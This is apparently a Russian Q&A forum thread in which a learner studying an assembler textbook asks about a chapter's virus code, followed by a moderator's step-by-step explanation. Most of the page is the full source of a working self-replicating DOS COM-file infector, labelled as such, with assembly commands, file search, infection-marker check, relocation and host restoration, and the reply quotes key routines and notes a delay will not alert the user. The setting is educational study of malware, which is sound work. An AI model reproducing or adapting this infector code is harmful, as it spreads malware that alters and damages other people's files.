Консультация № 188088
08.10.2015, 19:38
0.00 руб.
0 2 1
Здравствуйте! Разбираю код вируса из учебника Калашникова (глава 20), не совсем понятно для чего пишутся после вируса первые 6 байт com-файла:
mov ah,40h ;После тела вируса дописываем первые
mov cx,F_bytes ;настоящие шесть байт "файла-жертвы"...
mov dx,offset Finish

ведь даже зараженный com-файл, при запуске, их вроде не использует для затирания,
а используется массив: First_bytes db 4 dup (90h), 0CDh, 20h?

Приложение:

; VIRUS20.ASM - программа к Главе № 020

;----------------------------------------------------------------------------
; !!! ВНИМАНИЕ !!!
;
; ЭТО РАБОЧИЙ ВИРУС, СПОСОБНЫЙ ЗАРАЖАТЬ ДРУГИЕ ФАЙЛЫ!
; ПРЕЖДЕ, ЧЕМ АССЕМБЛИРОВАТЬ И ЗАПУСКАТЬ ЕГО, ПРОЧТИТЕ 20 ГЛАВУ!
;----------------------------------------------------------------------------


; (С) Авторские права на файлы-приложения принадлежат автору книги
; "Ассемблер? Это просто! Учимся программировать под MS-DOS"
; Автор: Калашников Олег Александрович (e-mail: Assembler@Kalashnikoff.ru)
; http://www.Kalashnikoff.ru

; --- Ассемблирование (получение *.com файла) ---
;При использовании MASM 6.11 - 6.13:
;ML.EXE virus20.asm /AT

;При использовании TASM:
;TASM.EXE virus20.asm
;TLINK.EXE virus20.obj /t/x


.286
CSEG segment
assume cs:CSEG, ds:CSEG, es:CSEG, ss:CSEG
org 100h

Begin:
push offset Init ;3 байта
ret ;1 байт
dw 1122h ;2 байта (метка, указывающая, что файл уже заражен)
; ---------
;ИТОГО: 6 байт

F_bytes equ $-offset Begin ;Длина первых байт "файла-жертвы"

; === Процедуры работы с файлами ===

; --- Открытие файла для записи ---
; Вход: DX - путь файлу ASCIZ
; Выход: Handle, BX - номер файла
Open_file proc
mov ax,3D02h ;Открываем файл для чтения/записи
mov dx,1Eh ;DX указывает на имя найденного файла в DTA
int 21h
mov Handle,ax ;Сохраняем номер файла
mov bx,ax
ret

Handle dw 0FFFFh ;Переменная для хранения номера файла
Open_file endp

; --- Закрытие файла ---
; Вход: Handle - номер открытого файла
; Выход: ничего
Close_file proc
cmp Handle,0FFFFh ;Нет открытых файлов?
je No_close ;Тогда выходим (закрывать нечего!)

mov bx,Handle ;Закрываем файл...
mov ah,3Eh
int 21h

No_close:
ret
Close_file endp

; --- Поиск первого файла ---
Find_first proc
mov ah,4Eh ;Ищем первый файл по маске (Mask_file)
xor cx,cx ;Атрибуты обычные (CX=0)
mov dx,offset Mask_file ;Адрес маски в DS:DX
int 21h ;Теперь имя файла находится по адресу 0BF00:001Eh

ret
Mask_file db '*.com',0 ;Маска для поиска (только COM-файлы)
Find_first endp

; --- Поиск следующих файлов ---
Find_next proc
xor dx,dx ;DS:DX указывают на DTA
xor cx,cx ;Атрибуты обычные
mov ah,4Fh
int 21h ;Теперь в DTA находится информация о следующем
;найденном файле
ret
Find_next endp

; --- Заражение файла ---
Infect_file proc
;Основная процедура заражения найденного файла.
;Будем следить за тем, что происходит с "файлом-жертвой".

;Допустим, заражаем такой файл (естественно, com-файл, а не asm!):

;╔═══════════════════════╤═════════════╤═════════════════════════════════════╗
;║Ассемблер │Машинные коды│Пояснения ║
;╟───────────────────────┼─────────────┼─────────────────────────────────────╢
;║mov ah,9 │B4 09 │B4-загрузка в AH, 09-что грузим ║
;║mov dx,offset Message │BA 0801 │BA-загрузка в DX, 0801-смещ. строки ║
;║int 21h │CD 21 │CD-int ║
;║ │ │ ║
;║ret │C3 │ ║
;║... │ ... │Еще какие-то данные/коды ║
;╚═══════════════════════╧═════════════╧═════════════════════════════════════╝

mov ax,cs:[1Ch] ;Получим второе слово длины заражаемого файла
or ax,ax ;Если оно не равно 0, то выходим...
jnz Error_infect ;...это значит, что размер файла больше 64Кб.

mov bp,cs:[1Ah] ;Получим младшее слово (т.е. размер файла)

call Open_file ;Открываем файл
jc Error_infect ;Ошибка - на выход

mov ah,3Fh
mov cx,F_bytes ;Читаем первые шесть байт "файла-жертвы"...
mov dx,offset Finish ;...в хвост нашего вируса.
int 21h
jc Error_infect

;╔═══════════════════════╤═════════════╤═════════════════════════════════════╗
;║Ассемблер │Машинные коды│Пояснения ║
;╟───────────────────────┼─────────────┼─────────────────────────────────────╢
;║->mov ah,9 │B4 09 │Читаем байты этой команды... ║
;║->mov dx,offset Message│BA 0801 │И этой... ║
;║->int │CD │И один байт этой. ║
;║... │ ... │Другие данные/коды (НЕ читаем!) ║
;╚═══════════════════════╧═════════════╧═════════════════════════════════════╝
;DX указывает на буфер, куда прочитали эти байты.
;Если файл заражен, то 4 и 5 байты будут равны 2211h (перевернуты наоборот)

;Проверим это, чтобы 2 раза не заражать один и тот же файл...

mov bx,dx
cmp word ptr [bx+4],1122h ;Проверим на то, заражен ли уже этот файл
je Error_infect ;Если да, то - на выход...

mov ax,4202h ;Установим указатель чтения/записи на конец файла.
mov bx,Handle
xor cx,cx ;Отсчитывать 0 байт...
xor dx,dx
int 21h
jc Error_infect

mov ah,40h ;В BX уже есть номер файла.
mov cx,offset Finish-100h-F_bytes ;Пишем в хвост "файла-жертвы"
mov dx,100h ;тело вируса.
int 21h
jc Error_infect

;Ситуация теперь такая:
;╔═══════════════════════╤═════════════╤═════════════════════════════════════╗
;║Ассемблер │Машинные коды│Пояснения ║
;╟───────────────────────┼─────────────┼─────────────────────────────────────╢
;║mov ah,9 │B4 09 │B4-загрузка в AH, 09-что грузим ║
;║mov dx,offset Message │BA 0801 │BA-загрузка в DX, 0801-смещ. строки ║
;║int 21h │CD 21 │CD-int ║
;║ │ │ ║
;║ret │C3 │ ║
;║... │ ... │Еще какие-то данные/коды ║
;║Здесь идет наш вирус │ ... │ ║
;╚═══════════════════════╧═════════════╧═════════════════════════════════════╝

mov ah,40h ;После тела вируса дописываем первые
mov cx,F_bytes ;настоящие шесть байт "файла-жертвы"...
mov dx,offset Finish
int 21h
jc Error_infect

;Получаем:
;╔═══════════════════════╤═════════════╤═════════════════════════════════════╗
;║Ассемблер │Машинные коды│Пояснения ║
;╟───────────────────────┼─────────────┼─────────────────────────────────────╢
;║mov ah,9 │B4 09 │B4-загрузка в AH, 09-что грузим ║
;║mov dx,offset Message │BA 0801 │BA-загрузка в DX, 0801-смещ. строки ║
;║int 21h │CD 21 │CD-int ║
;║ │ │ ║
;║ret │C3 │ ║
;║... │ ... │Еще какие-то данные/коды ║
;║ │ │ ║
;║Здесь идет наш вирус │ ... │ ║
;║mov ah,9 │B4 09 │ ║
;║mov dx,offset Message │BA 0801 │ ║
;║int │CD │ ║
;╚═══════════════════════╧═════════════╧═════════════════════════════════════╝
;Шесть байт дописали в файл прямо за кодом вируса.

call Close_file ;Закрываем файл.

add bp,offset Init ;К длине файла прибавляем смещение метки Init
mov ss:[101h],bp ;Заносим полученный адрес после push

call Open_file ;Открываем файл. Теперь указатель в начале...

mov ah,40h ;Запишем первые шесть байт (переход на вирус)
mov cx,F_bytes ;поверх уже имеющихся...
push ss ;Пишем с сегмента "файла-жертвы"
pop ds
mov dx,100h
int 21h

;╔═══════════════════════╤═════════════╤═════════════════════════════════════╗
;║Ассемблер │Машинные коды│Пояснения ║
;╟───────────────────────┼─────────────┼─────────────────────────────────────╢
;║push адрес вируса │68 адрес │Адрес занимает 2 байта ║
;║ret │С3 │ ║
;║1122h │1122 │Указатель на то, что файл уже заражен║
;║and ax,bx │21C3 │Вот такая картина... ║
;║... │ ... │Еще какие-то данные/коды ║
;║ │ │ ║
;║Здесь идет наш вирус │ ... │Этот адрес толкает в стек push ║
;║mov ah,9 │B4 09 │ ║
;║mov dx,offset Message │BA 0801 │ ║
;║int │CD │ ║
;╚═══════════════════════╧═════════════╧═════════════════════════════════════╝

push cs
pop ds
call Close_file ;Закрываем файл

clc ;Сигнал успешного заражения...
ret

Error_infect:
call Close_file ;Закрываем файл
stc ;Сигнал того, что произошла ошибка при заражении.
ret
Infect_file endp



; === Процедура инициализации вируса ===
Init:
pusha ;Сохраним все регистры в стеке

call Get_IP ;Получим смещение, где мы сейчас находимся
Get_IP:
pop ax ;Теперь в AX - смещение
sub ax,offset Get_IP ;Вычтем из него реальный адрес, где мы будем
;находиться в сегменте 0BF00h
;Получим размер файла-"жертвы", если его нет
;(т.е. мы запускаем вирус первый раз),
;то AX будет равен 0

push 0BF00h
pop es ;ES - сегмент, куда будем перемещать код вируса.

mov di,offset Open_file ;DI - смещение (адрес самой первой процедуры)
mov si,di
add si,ax ;SI должен содержать РЕАЛЬНЫЙ адрес (смещение), т.к. мы
;пока еще в сегменте "файла-жертвы"...

mov cx,offset Finish-offset Open_file ;CX = длина нашего вируса
rep movsb ;Теперь в памяти две копии вируса

;Занесем в стек смещение (Lab_return+AX) и сегмент (CS) возврата из копии...
mov bx,offset Lab_return
add bx,ax ;Как бы искусственно заносим адрес возврата для retf
push cs
push bx

;Занесем в стек адрес для перехода в нашу копию:
; * сегмент - 0BF00h
; * смещение - Lab_jmp
mov bx,offset Lab_jmp ;Аналогично вышесказанному...
push 0BF00h
push bx

;Теперь перейдем на метку Lab_jmp, расположенную в сегменте 0BF00h.
retf


; Теперь мы уже в области экрана
Lab_jmp:
;CS теперь равен 0BF00h.

push cs ;Настроим регистр DS
pop ds

mov ah,1Ah ;Установим DTA для поиска файлов
xor dx,dx ;Он устанавливается на тот адрес, который содержится
int 21h ;В регистрах DS:DX. В отладчике смотрите,
;что находится в памяти на которую указывают данные
;регистры, т.е. DS:DX...

call Find_first ;Ищем первый файл
jc Nomore_files ;Нет COM-файлов в текущем каталоге - на выход

Inf_file:
call Infect_file ;Нашли - пробуем заразить
jnc Nomore_files ;Удалось заразить - выходим

call Find_next ;Не удалось заразить - ищем следующий
jnc Inf_file ;Нашли еще один COM-файл; пробуем заразить...


;Восстановим первые шесть байт файла-жертвы в памяти
;Вот, что мы имеем до восстановления байт:
;╔═══════════════════════╤═════════════╤═════════════════════════════════════╗
;║Ассемблер │Машинные коды│Пояснения ║
;╟───────────────────────┼─────────────┼─────────────────────────────────────╢
;║push адрес вируса │68 адрес │Адрес занимает 2 байта ║
;║ret │С3 │ ║
;║1122h │1122 │Указатель на то, что файл уже заражен║
;║and ax,bx │21C3 │Вот такая картина... ║
;║... │ ... │Еще какие-то данные/коды ║
;║ │ │ ║
;║Здесь идет наш вирус │ ... │ ║
;║Init: │ --- │Этот адрес толкает в стек push ║
;║ │ │ ║
;║->mov ah,9 │B4 09 │Вот эти байты нужно... ║
;║->mov dx,offset Message│BA 0801 │...переместить по адресу... ║
;║->int │CD │...100h, чтобы восстановить файл ║
;╚═══════════════════════╧═════════════╧═════════════════════════════════════╝
;Примечание. Init: - метка инициализации вируса. См. ниже.

Nomore_files:
mov si,offset First_bytes ;DS:SI - на массив из шести байт
mov di,100h ;ES:DI - куда перемещать строку (шесть байт)
push ss ;ES должен указывать на сегмент "файла-жертвы"
pop es
mov cx,F_bytes ;6 байт перемещаем: DS:SI = ES:DI
rep movsb

;Вот, что получили после перемещения шести байт "файла-жертвы":
;╔═══════════════════════╤═════════════╤═════════════════════════════════════╗
;║Ассемблер │Машинные коды│Пояснения ║
;╟───────────────────────┼─────────────┼─────────────────────────────────────╢
;║mov ah,9 │B4 09 │Эта команда находится по адресу 100h ║
;║mov dx,offset Message │BA 0801 │ ║
;║int 21h │CD 21 │ ║
;║ │ │ ║
;║ret │C3 │ ║
;║... │ ... │Еще какие-то данные/коды ║
;║ │ │ ║
;║Здесь идет наш вирус │ ... │ ║
;║mov ah,9 │B4 09 │ ║
;║mov dx,offset Message │BA 0801 │ ║
;║int │CD │ ║
;╚═══════════════════════╧═════════════╧═════════════════════════════════════╝
;Осталось только передать управление на адрес 100h.

;Вернемся в сегмент программы-"жертвы", т.е. туда, где мы
;были изначально.
retf


; Теперь мы опять в сегменте зараженной программы
Lab_return:
push cs ;Восстановим DS (ES уже в порядке!)
pop ds

mov ah,1Ah ;Восстановим DTA
mov dx,80h
int 21h

popa ;Восстановим регистры

;!!! Передаем управление "файлу-жертве" !!!
push 100h ;Обратите внимание, как мы теперь переходим...
ret ;...на адрес 100h.


; === Данные ===
;Здесь (First_bytes) будут храниться первые байты "файла-жертвы".
;Если это первый запуск вируса, то по умолчанию получим:
;nop (90h)
;nop (90h)
;nop (90h)
;nop (90h)
;int 20h (0CDh, 20h)
;Итого: 6 байт

;Первые шесть байт зараженного файла будут такими:
;1 - push (68h)
;2,3 - адрес метки инициализации вируса
;4 - ret (0C3h)
;5,6 - заражен ли файл уже (1122h)?
First_bytes db 4 dup (90h), 0CDh, 20h

Finish equ $

CSEG ends
end Begin

Обсуждение

давно
Старший Модератор
31795
6196
08.10.2015, 19:59
общий
Адресаты:
Первые шесть байт нужны, для получения управления вирусом.
1)При запуске зараженной программы, вирус сам себя переносит в экранный буфер и начинает искать новые файлы-жертвы;
2)Востанавливает первые шесть байт зараженой программы и передает им управление;

Об авторе:
Мне безразлично, что Вы думаете о обо мне, но я рад за Вас - Вы начали думать.

давно
Старший Модератор
31795
6196
11.10.2015, 15:09
общий
это ответ
Здравствуйте, Посетитель - 398958!

На код нужно смотреть как на вирус.
1)Способ распространения его по сети: это может быть как посещение "интерестного" сайта и первое выполнение вируса на РС, или с помощью несанкционированого доступа, запуск вируса на машине пользователя и т.д.. Это не столь важно, главное вирус как-то уже попал на машину пользователя.
2)Вирус должен получать управление, именно для этого меняются первые 6-ть байт. Эти байты хранят команду передачи упраления и маркер уже зараженого файла. В данном случае вирус дописывает себя в конец файла. Длина заражаемого файла не известна, по этому используется так называемый лямбда-вызов.
Код:
       call Get_IP
Get_IP:
pop ax

После этого вирус знает текущий адрес, все остальное он будет вычислять с учетом полученной информации.
3)В память видео-буфера копируется только чистый код вируса и ему передается управление.
Код:
       sub ax,offset Get_IP
push 0BF00h
pop es
mov di,offset Open_file
mov si,di
add si,ax
mov cx,offset Finish-offset Open_file
rep movsb
mov bx,offset Lab_return
add bx,ax
push cs
push bx
mov bx,offset Lab_jmp
push 0BF00h
push bx
retf

После этого начинается поиск СОМ-файлов. Найденый файл, загружается в память, проверяется маркер (1122h) заражености, и если все чисто, вирус дописывает себя в памяти в конец файла, меняет первые 6-ть байт, сохраняя оригинал в конце самого файла. Этим занимается код:
Код:
       call Find_first
jc Nomore_files
Inf_file:
call Infect_file
jnc Nomore_files
call Find_next
jnc Inf_file

4)Отработав поиск, вирус с чувством удовлетворения передает управление запущеному файлу, востановив первые 6-ть байт
Код:
Nomore_files:
mov si,offset First_bytes
mov di,100h
push ss
pop es
mov cx,F_bytes
rep movsb
Lab_return:
push cs
pop ds
mov ah,1Ah
mov dx,80h
int 21h
popa
push 100h
ret

5)Задержка при запуске на пару секунд, не насторожит пользователя, "Ну мало ли чем там система занята". Главное запускаемая программа начала работать. Именно для этого и вотанавливаются первые байты. Такой способ заражения характерен для СОМ-файлов, т.к. размер файла, это и есть длина кода, первая команда всегда выполняется с адреса 0х100. В случае с ЕХЕ-файлами вирусу нужно было бы анализировать MZ-заголовок, расположение сегментов, точку входа, а это уже лишний код, ну и связанные с этим проблемы.

Удачи!
Об авторе:
Мне безразлично, что Вы думаете о обо мне, но я рад за Вас - Вы начали думать.

Форма ответа